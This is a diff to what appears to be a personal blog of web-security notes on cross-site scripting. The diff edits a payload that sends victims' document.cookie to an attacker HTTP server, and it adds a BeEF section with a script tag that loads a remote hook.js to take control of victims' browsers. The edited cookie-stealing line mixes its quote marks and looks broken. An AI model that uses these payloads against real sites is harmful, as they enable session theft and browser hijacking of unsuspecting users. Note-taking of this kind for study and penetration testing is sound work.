--- a/_posts/notes/web/2021-12-12-xss.md
+++ b/_posts/notes/web/2021-12-12-xss.md
@@ -33,5 +33,14 @@ or php...:
 
 Then we send others cookie to our http server:
 {% highlight html %}
-<script>document.write('<img src="http://192.168.0.2:80/xss.png?cookie='+ document.cookie + "')</script>
+<script>document.write('<img src="http://192.168.0.2:80/xss.png?cookie="+ document.cookie + "')</script>
+{% endhighlight %}
+
+# Tools
+
+## BeEF
+We can use BeEF to capture traffic with XSS.
+In a XSS we send:
+{% highlight html %}
+<script src="http://192.168.1.1:3000/hook.js"></script>
 {% endhighlight %}
